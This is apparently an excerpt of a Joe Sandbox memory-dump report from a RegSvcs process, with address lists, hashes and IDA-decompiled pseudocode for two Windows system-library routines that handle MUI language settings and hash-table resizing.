0x010229e6
0x00fdb51f
0x00fdb51f
0x00fdb520
0x00fdb525
0x00fdb52b
0x00fdb52d
0x00fdb52e
0x00fdb530
0x00fdb535
0x00fdb53b
0x00fdb53d
0x01022a07
0x00000000
0x01022a07
0x00fdb549
0x00fdb54e
0x01022a12
0x01022a15
0x00000000
0x00000000
0x01022a24
0x00fdb559
0x00fdb55c
0x01022a34
0x01022a3b
0x01022a4d
0x01022a4d
0x01022a3b
0x00fdb566
0x00fdb56b
0x00fdb56f
0x00fdb57b
0x00fdb582
0x01022a57
0x01022a5c
0x01022a5c
0x00fdb582
0x00fdb58b
0x00fdb58e
0x00fdb592
0x00fdb596
0x00fdb599
0x00fdb59b
0x00fdb59e
0x00fdb5a3
0x00fdb5a6
0x00fdb5a9
0x01022a66
0x01022a67
0x01022a73
0x01022a78
0x00fdb5b8
0x00fdb5b8
0x00fdb5bb
0x00fdb5bd
0x00fdb5bd
0x00fdb5c4
0x00fdb5f7
0x00fdb5f7
0x00fdb600
0x00fdb606
0x00fdb60c
0x00fdb612
0x00fdb618
0x00fdb621
0x00fdb623
0x00fdb629
0x00fdb629
0x00fdb62c
0x00fdb62f
0x00fdb633
0x00fdb636
0x00fdb639
0x00fdb71d
0x00fdb720
0x00fdb736
0x00fdb660
0x00fdb660
0x00fdb662
0x00fdb665
0x00fdb66a
0x00fdb6e6
0x00fdb6e7
0x00fdb6ea
0x00fdb6ef
0x01022ad1
0x01022ad2
0x01022ad8
0x01022add
0x01022add
0x00fdb6f5
0x00fdb6f5
0x00fdb672
0x00fdb675
0x00fdb67a
0x01022ae5
0x01022ae8
0x00000000
0x00000000
0x01022af4
0x01022afc
0x00000000
0x00fdb680
0x00fdb680
0x00fdb680
0x00fdb685
0x00fdb687
0x00fdb68a
0x01022b06
0x01022b0c
0x01022b13
0x01022b1e
0x01022b20
0x01022b2b
0x01022b2b
0x01022b2b
0x01022b34
0x01022b45
0x01022b45
0x01022b13
0x00fdb696
0x00fdb69b
0x00fdb6a0
0x01022b4f
0x01022b52
0x00000000
0x00000000
0x01022b61
0x00000000
0x00fdb6a6
0x00fdb6a6
0x00fdb6a6
0x00fdb6a8
0x00fdb6ab
0x01022b70
0x01022b72
0x01022b7d
0x01022b7d
0x01022b7d
0x01022b86
0x01022b97
0x01022b97
0x00fdb6b1
0x00000000
0x00fdb6b1
0x00fdb6a0
0x00fdb67a
0x00fdb722
0x00fdb722
0x00fdb655
0x00fdb65d
0x00000000
0x00fdb5c6
0x00fdb5c6
0x00fdb5ce
0x01022a83
0x01022a97
0x01022a97
0x01022a9a
0x00000000
0x00000000
0x01022a88
0x01022a8a
0x01022a8c
0x01022a8f
0x01022a92
0x01022aa1
0x01022aa1
0x01022aa2
0x01022aab
0x01022ab0
0x00000000
0x01022ab0
0x01022a94
0x01022a94
0x00000000
0x01022a9c
0x00fdb5d4
0x00fdb5d4
0x00fdb5d6
0x00fdb5d9
0x00fdb5de
0x00fdb5e1
0x00fdb5e4
0x01022ab8
0x01022ab9
0x01022ac4
0x01022ac9
0x00fdb5f2
0x00fdb5f2
0x00fdb5f4
0x00fdb5f4
0x00000000
0x00fdb5e4
0x00fdb5c4
0x00fdb554
0x00fdb554
0x00000000
0x00fdb554

Strings

HEAP: , xrefs: 01022980
HEAP[%wZ]: , xrefs: 01022973
(UCRBlock->Size >= *Size), xrefs: 0102298B

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: 67b3f6c2e29fc3d3bdf7b3a1b4f452ec8afa91def2a331811d602ce5471a209b
Instruction ID: 93c66a4d61259a4bceef7bbc43ddbd7d8dca90cf120c7f6a50e0e5cb7e729c77
Opcode Fuzzy Hash: 67b3f6c2e29fc3d3bdf7b3a1b4f452ec8afa91def2a331811d602ce5471a209b
Instruction Fuzzy Hash: 4FE18C71B00205DFDB19CFA8C894BBAB7B6FF44700F2981AAE4569B391D734E941DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00FC3D34 Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00FC3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E00FC1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E00FC1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E00FC1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E00FC1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E00FC1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L00FD4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E00FFF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E01001370(_t276, 0xf94e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E00FFBB40(0,  &_v68, _t170);
									if(L00FC43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E00FFBB40(_t257,  &_v68, _t243);
								if(L00FC43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E01001370(_t278, 0xf94e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L00FD4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E00FFF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E01001370(_v16, 0xf94e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E00FFBB40(_t262,  &_v68, _t244);
								if(L00FC43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E01001370(_t282, 0xf94e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E00FFBB40(_t262,  &_v68, _t201);
							if(L00FC43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L00FD4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E00FFF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E01001370(_t280, 0xf94e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E00FFBB40(_t267,  &_v68, _t245);
							if(L00FC43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E01001370(_t284, 0xf94e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E00FFBB40(_t267,  &_v68, _t224);
						if(L00FC43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x00fc3d3c
0x00fc3d42
0x00fc3d44
0x00fc3d46
0x00fc3d49
0x00fc3d4c
0x00fc3d4f
0x00fc3d52
0x00fc3d55
0x00fc3d58
0x00fc3d5b
0x00fc3d5f
0x00fc3d61
0x00fc3d66
0x01018213
0x01018218
0x00fc4085
0x00fc4088
0x00fc408e
0x00fc4094
0x00fc409a
0x00fc40a0
0x00fc40a6
0x00fc40a9
0x00fc40af
0x00fc40b6
0x00fc40bd
0x00fc40bd
0x00fc3d83
0x0101821f
0x01018229
0x01018238
0x01018238
0x0101823d
0x0101823d
0x00fc3da0
0x00fc3daf
0x00fc3db5
0x00fc3dba
0x00fc3dba
0x00fc3dd4
0x00fc3e94
0x00fc3eab
0x00fc3f6d
0x00fc3f84
0x00fc406b
0x00fc406b
0x00fc406e
0x00fc406e
0x00fc4070
0x00fc4074
0x01018351
0x01018351
0x00fc407a
0x00fc407f
0x0101835d
0x01018370
0x01018377
0x01018379
0x0101837c
0x0101837c
0x0101835d
0x00000000
0x00fc407f
0x00fc3f8a
0x00fc3f8d
0x00fc3f90
0x00fc3f95
0x0101830d
0x0101830f
0x00fc3f9b
0x00fc3fac
0x00fc3fae
0x00fc3fb1
0x00fc3fb1
0x00fc3fb6
0x01018317
0x0101831a
0x00000000
0x00fc3fbc
0x00fc3fc1
0x00fc3fc9
0x00fc3fd7
0x00fc3fda
0x00fc3fdd
0x00fc4021
0x00fc4021
0x00fc4029
0x00fc4030
0x00fc4044
0x00fc4046
0x00fc4046
0x00fc4044
0x00fc4049
0x01018327
0x01018334
0x01018339
0x0101833c
0x00fc404f
0x00fc404f
0x00fc404f
0x00fc4051
0x00fc4056
0x00fc4063
0x00fc4063
0x00fc4068
0x00000000
0x00fc4068
0x00fc3fdf
0x00fc3fe2
0x00fc3fe4
0x00fc3fe7
0x00fc3fef
0x00fc4003
0x00fc4005
0x00fc4005
0x00fc400c
0x00fc4013
0x00fc4016
0x00fc4017
0x00fc401b
0x00fc401e
0x00000000
0x00fc401e
0x00fc3fb6
0x00fc3eb1
0x00fc3eb4
0x00fc3eb7
0x00fc3ebc
0x010182a9
0x010182ab
0x00fc3ec2
0x00fc3ed3
0x00fc3ed5
0x00fc3ed8
0x00fc3ed8
0x00fc3edd
0x010182b3
0x010182b6
0x00000000
0x00fc3ee3
0x00fc3ee8
0x00fc3eed
0x00fc3ef0
0x00fc3ef3
0x00fc3f02
0x00fc3f05
0x00fc3f08
0x010182c0
0x010182c3
0x010182c5
0x010182c8
0x010182d0
0x010182e4
0x010182e6
0x010182e6
0x010182ed
0x010182f4
0x010182f7
0x010182f8
0x010182fc
0x010182ff
0x010182ff
0x00fc3f0e
0x00fc3f11
0x00fc3f16
0x00fc3f1d
0x00fc3f31
0x01018307
0x01018307
0x00fc3f31
0x00fc3f39
0x00fc3f48
0x00fc3f4d
0x00fc3f50
0x00fc3f50
0x00fc3f53
0x00fc3f58
0x00fc3f65
0x00fc3f65
0x00fc3f6a
0x00000000
0x00fc3f6a
0x00fc3edd
0x00fc3dda
0x00fc3ddd
0x00fc3de0
0x00fc3de5
0x01018245
0x00fc3deb
0x00fc3df7
0x00fc3dfc
0x00fc3dfe
0x00fc3e01
0x00fc3e01
0x00fc3e06
0x0101824d
0x0101824f
0x01018254
0x00000000
0x00fc3e0c
0x00fc3e11
0x00fc3e16
0x00fc3e19
0x00fc3e29
0x00fc3e2c
0x00fc3e2f
0x0101825c
0x0101825f
0x01018261
0x01018264
0x0101826c
0x01018280
0x01018282
0x01018282
0x01018289
0x01018290
0x01018293
0x01018294
0x01018298
0x0101829b
0x0101829b
0x00fc3e35
0x00fc3e38
0x00fc3e3d
0x00fc3e44
0x00fc3e58
0x010182a3
0x010182a3
0x00fc3e58
0x00fc3e60
0x00fc3e6f
0x00fc3e74
0x00fc3e77
0x00fc3e77
0x00fc3e7a
0x00fc3e7f
0x00fc3e8c
0x00fc3e8c
0x00fc3e91
0x00000000
0x00fc3e91

Strings

WindowsExcludedProcs, xrefs: 00FC3D6F
Kernel-MUI-Number-Allowed, xrefs: 00FC3D8C
Kernel-MUI-Language-Allowed, xrefs: 00FC3DC0
Kernel-MUI-Language-SKU, xrefs: 00FC3F70
Kernel-MUI-Language-Disallowed, xrefs: 00FC3E97

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 43bb529b906b0b26606178446495977bf54c7bf3f167186b28028f07bd0c797d
Instruction ID: fec4afa64883b224f73598d1ad72dce628344f36051b73b968dd46f4792cf613
Opcode Fuzzy Hash: 43bb529b906b0b26606178446495977bf54c7bf3f167186b28028f07bd0c797d
Instruction Fuzzy Hash: FAF16E72D40219EFCB11DF98CA81EEEBBB9FF48750F14416AE505A7251E734AE01EB90

Uniqueness

Uniqueness Score: -1.00%

Function 0108E824 Relevance: 6.5, APIs: 4, Instructions: 493
timeCOMMONCrypto

Download Yara Rule

C-Code - Quality: 50%

			E0108E824(signed int __ecx, signed int* __edx) {
				signed int _v8;
				signed char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t177;
				signed int _t179;
				unsigned int _t202;
				signed char _t207;
				signed char _t210;
				signed int _t230;
				void* _t244;
				unsigned int _t247;
				signed int _t288;
				signed int _t289;
				signed int _t291;
				signed char _t293;
				signed char _t295;
				signed char _t298;
				intOrPtr* _t303;
				signed int _t310;
				signed char _t316;
				signed int _t319;
				signed char _t323;
				signed char _t330;
				signed int _t334;
				signed int _t337;
				signed int _t341;
				signed char _t345;
				signed char _t347;
				signed int _t353;
				signed char _t354;
				void* _t383;
				signed char _t385;
				signed char _t386;
				unsigned int _t392;
				signed int _t393;
				signed int _t395;
				signed int _t398;
				signed int _t399;
				signed int _t401;
				unsigned int _t403;
				void* _t404;
				unsigned int _t405;
				signed int _t406;
				signed char _t412;
				unsigned int _t413;
				unsigned int _t418;
				void* _t419;
				void* _t420;
				void* _t421;
				void* _t422;
				void* _t423;
				signed char* _t425;
				signed int _t426;
				signed int _t428;
				unsigned int _t430;
				signed int _t431;
				signed int _t433;

				_v8 =  *0x10ad360 ^ _t433;
				_v40 = __ecx;
				_v16 = __edx;
				_t289 = 0x4cb2f;
				_t425 = __edx[1];
				_t403 =  *__edx << 2;
				if(_t403 < 8) {
					L3:
					_t404 = _t403 - 1;
					if(_t404 == 0) {
						L16:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						L17:
						_t426 = _v40;
						_v20 = _t426 + 0x1c;
						_t177 = L00FDFAD0(_t426 + 0x1c);
						_t385 = 0;
						while(1) {
							L18:
							_t405 =  *(_t426 + 4);
							_t179 = (_t177 | 0xffffffff) << (_t405 & 0x0000001f);
							_t316 = _t289 & _t179;
							_v24 = _t179;
							_v32 = _t316;
							_v12 = _t316 >> 0x18;
							_v36 = _t316 >> 0x10;
							_v28 = _t316 >> 8;
							if(_t385 != 0) {
								goto L21;
							}
							_t418 = _t405 >> 5;
							if(_t418 == 0) {
								_t406 = 0;
								L31:
								if(_t406 == 0) {
									L35:
									E00FDFA00(_t289, _t316, _t406, _t426 + 0x1c);
									 *0x10ab1e0(0xc +  *_v16 * 4,  *((intOrPtr*)(_t426 + 0x28)));
									_t319 =  *((intOrPtr*)( *((intOrPtr*)(_t426 + 0x20))))();
									_v36 = _t319;
									if(_t319 != 0) {
										asm("stosd");
										asm("stosd");
										asm("stosd");
										_t408 = _v16;
										 *(_t319 + 8) =  *(_t319 + 8) & 0xff000001 | 0x00000001;
										 *((char*)(_t319 + 0xb)) =  *_v16;
										 *(_t319 + 4) = _t289;
										_t53 = _t319 + 0xc; // 0xc
										E00FD2280(E00FFF3E0(_t53,  *((intOrPtr*)(_v16 + 4)),  *_v16 << 2), _v20);
										_t428 = _v40;
										_t386 = 0;
										while(1) {
											L38:
											_t202 =  *(_t428 + 4);
											_v16 = _v16 | 0xffffffff;
											_v16 = _v16 << (_t202 & 0x0000001f);
											_t323 = _v16 & _t289;
											_v20 = _t323;
											_v20 = _v20 >> 0x18;
											_v28 = _t323;
											_v28 = _v28 >> 0x10;
											_v12 = _t323;
											_v12 = _v12 >> 8;
											_v32 = _t323;
											if(_t386 != 0) {
												goto L41;
											}
											_t247 = _t202 >> 5;
											_v24 = _t247;
											if(_t247 == 0) {
												_t412 = 0;
												L50:
												if(_t412 == 0) {
													L53:
													_t291 =  *(_t428 + 4);
													_v28 =  *((intOrPtr*)(_t428 + 0x28));
													_v44 =  *(_t428 + 0x24);
													_v32 =  *((intOrPtr*)(_t428 + 0x20));
													_t207 = _t291 >> 5;
													if( *_t428 < _t207 + _t207) {
														L74:
														_t430 = _t291 >> 5;
														_t293 = _v36;
														_t210 = (_t207 | 0xffffffff) << (_t291 & 0x0000001f) &  *(_t293 + 4);
														_v44 = _t210;
														_t159 = _t430 - 1; // 0xffffffdf
														_t428 = _v40;
														_t330 =  *(_t428 + 8);
														_t386 = _t159 & (_v44 >> 0x00000018) + ((_v44 >> 0x00000010 & 0x000000ff) + ((_t210 >> 0x00000008 & 0x000000ff) + ((_t210 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
														_t412 = _t293;
														 *_t293 =  *(_t330 + _t386 * 4);
														 *(_t330 + _t386 * 4) = _t293;
														 *_t428 =  *_t428 + 1;
														_t289 = 0;
														L75:
														E00FCFFB0(_t289, _t412, _t428 + 0x1c);
														if(_t289 != 0) {
															_t428 =  *(_t428 + 0x24);
															 *0x10ab1e0(_t289,  *((intOrPtr*)(_t428 + 0x28)));
															 *_t428();
														}
														L77:
														return E00FFB640(_t412, _t289, _v8 ^ _t433, _t386, _t412, _t428);
													}
													_t334 = 2;
													_t207 = E00FEF3D5( &_v24, _t207 * _t334, _t207 * _t334 >> 0x20);
													if(_t207 < 0) {
														goto L74;
													}
													_t413 = _v24;
													if(_t413 < 4) {
														_t413 = 4;
													}
													 *0x10ab1e0(_t413 << 2, _v28);
													_t207 =  *_v32();
													_t386 = _t207;
													_v16 = _t386;
													if(_t386 == 0) {
														_t291 =  *(_t428 + 4);
														if(_t291 >= 0x20) {
															goto L74;
														}
														_t289 = _v36;
														_t412 = 0;
														goto L75;
													} else {
														_t108 = _t413 - 1; // 0x3
														_t337 = _t108;
														if((_t413 & _t337) == 0) {
															L62:
															if(_t413 > 0x4000000) {
																_t413 = 0x4000000;
															}
															_t295 = _t386;
															_v24 = _v24 & 0x00000000;
															_t392 = _t413 << 2;
															_t230 = _t428 | 0x00000001;
															_t393 = _t392 >> 2;
															asm("sbb ecx, ecx");
															_t341 =  !(_v16 + _t392) & _t393;
															if(_t341 <= 0) {
																L67:
																_t395 = (_t393 | 0xffffffff) << ( *(_t428 + 4) & 0x0000001f);
																_v32 = _t395;
																_v20 = 0;
																if(( *(_t428 + 4) & 0xffffffe0) <= 0) {
																	L72:
																	_t345 =  *(_t428 + 8);
																	_t207 = _v16;
																	_t291 =  *(_t428 + 4) & 0x0000001f | _t413 << 0x00000005;
																	 *(_t428 + 8) = _t207;
																	 *(_t428 + 4) = _t291;
																	if(_t345 != 0) {
																		 *0x10ab1e0(_t345, _v28);
																		_t207 =  *_v44();
																		_t291 =  *(_t428 + 4);
																	}
																	goto L74;
																} else {
																	goto L68;
																}
																do {
																	L68:
																	_t298 =  *(_t428 + 8);
																	_t431 = _v20;
																	_v12 = _t298;
																	while(1) {
																		_t347 =  *(_t298 + _t431 * 4);
																		_v24 = _t347;
																		if((_t347 & 0x00000001) != 0) {
																			goto L71;
																		}
																		 *(_t298 + _t431 * 4) =  *_t347;
																		_t300 =  *(_t347 + 4) & _t395;
																		_t398 = _v16;
																		_t353 = _t413 - 0x00000001 & (( *(_t347 + 4) & _t395) >> 0x00000018) + ((( *(_t347 + 4) & _t395) >> 0x00000010 & 0x000000ff) + ((( *(_t347 + 4) & _t395) >> 0x00000008 & 0x000000ff) + ((_t300 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
																		_t303 = _v24;
																		 *_t303 =  *((intOrPtr*)(_t398 + _t353 * 4));
																		 *((intOrPtr*)(_t398 + _t353 * 4)) = _t303;
																		_t395 = _v32;
																		_t298 = _v12;
																	}
																	L71:
																	_v20 = _t431 + 1;
																	_t428 = _v40;
																} while (_v20 <  *(_t428 + 4) >> 5);
																goto L72;
															} else {
																_t399 = _v24;
																do {
																	_t399 = _t399 + 1;
																	 *_t295 = _t230;
																	_t295 = _t295 + 4;
																} while (_t399 < _t341);
																goto L67;
															}
														}
														_t354 = _t337 | 0xffffffff;
														if(_t413 == 0) {
															L61:
															_t413 = 1 << _t354;
															goto L62;
														} else {
															goto L60;
														}
														do {
															L60:
															_t354 = _t354 + 1;
															_t413 = _t413 >> 1;
														} while (_t413 != 0);
														goto L61;
													}
												}
												_t89 = _t412 + 8; // 0x8
												_t244 = E0108E7A8(_t89);
												_t289 = _v36;
												if(_t244 == 0) {
													_t412 = 0;
												}
												goto L75;
											}
											_t386 =  *(_t428 + 8) + (_v24 - 0x00000001 & (_v20 & 0x000000ff) + 0x164b2f3f + (((_t323 & 0x000000ff) * 0x00000025 + (_v12 & 0x000000ff)) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025) * 4;
											_t323 = _v32;
											while(1) {
												L41:
												_t386 =  *_t386;
												_v12 = _t386;
												if((_t386 & 0x00000001) != 0) {
													break;
												}
												if(_t323 == ( *(_t386 + 4) & _v16)) {
													L45:
													if(_t386 == 0) {
														goto L53;
													}
													if(E0108E7EB(_t386, _t408) != 0) {
														_t412 = _v12;
														goto L50;
													}
													_t386 = _v12;
													goto L38;
												}
											}
											_t386 = 0;
											_v12 = 0;
											goto L45;
										}
									}
									_t412 = 0;
									goto L77;
								}
								_t38 = _t406 + 8; // 0x8
								_t364 = _t38;
								if(E0108E7A8(_t38) == 0) {
									_t406 = 0;
								}
								E00FDFA00(_t289, _t364, _t406, _v20);
								goto L77;
							}
							_t24 = _t418 - 1; // -1
							_t385 =  *((intOrPtr*)(_t426 + 8)) + (_t24 & (_v12 & 0x000000ff) + 0x164b2f3f + (((_t316 & 0x000000ff) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025 + (_v36 & 0x000000ff)) * 0x00000025) * 4;
							_t316 = _v32;
							L21:
							_t406 = _v24;
							while(1) {
								_t385 =  *_t385;
								_v12 = _t385;
								if((_t385 & 0x00000001) != 0) {
									break;
								}
								if(_t316 == ( *(_t385 + 4) & _t406)) {
									L26:
									if(_t385 == 0) {
										goto L35;
									}
									_t177 = E0108E7EB(_t385, _v16);
									if(_t177 != 0) {
										_t406 = _v12;
										goto L31;
									}
									_t385 = _v12;
									goto L18;
								}
							}
							_t385 = 0;
							_v12 = 0;
							goto L26;
						}
					}
					_t419 = _t404 - 1;
					if(_t419 == 0) {
						L15:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L16;
					}
					_t420 = _t419 - 1;
					if(_t420 == 0) {
						L14:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L15;
					}
					_t421 = _t420 - 1;
					if(_t421 == 0) {
						L13:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L14;
					}
					_t422 = _t421 - 1;
					if(_t422 == 0) {
						L12:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L13;
					}
					_t423 = _t422 - 1;
					if(_t423 == 0) {
						L11:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L12;
					}
					if(_t423 != 1) {
						goto L17;
					} else {
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L11;
					}
				} else {
					_t401 = _t403 >> 3;
					_t403 = _t403 + _t401 * 0xfffffff8;
					do {
						_t383 = ((((((_t425[1] & 0x000000ff) * 0x25 + (_t425[2] & 0x000000ff)) * 0x25 + (_t425[3] & 0x000000ff)) * 0x25 + (_t425[4] & 0x000000ff)) * 0x25 + (_t425[5] & 0x000000ff)) * 0x25 + (_t425[6] & 0x000000ff)) * 0x25 - _t289 * 0x2fe8ed1f;
						_t310 = ( *_t425 & 0x000000ff) * 0x1a617d0d;
						_t288 = _t425[7] & 0x000000ff;
						_t425 =  &(_t425[8]);
						_t289 = _t310 + _t383 + _t288;
						_t401 = _t401 - 1;
					} while (_t401 != 0);
					goto L3;
				}
			}

0x0108e833
0x0108e839
0x0108e83e
0x0108e841
0x0108e848
0x0108e84b
0x0108e851
0x0108e8b2
0x0108e8b2
0x0108e8b5
0x0108e90b
0x0108e911
0x0108e913
0x0108e913
0x0108e91a
0x0108e91d
0x0108e922
0x0108e924
0x0108e924
0x0108e924
0x0108e92f
0x0108e933
0x0108e935
0x0108e93a
0x0108e940
0x0108e948
0x0108e950
0x0108e955
0x00000000
0x00000000
0x0108e957
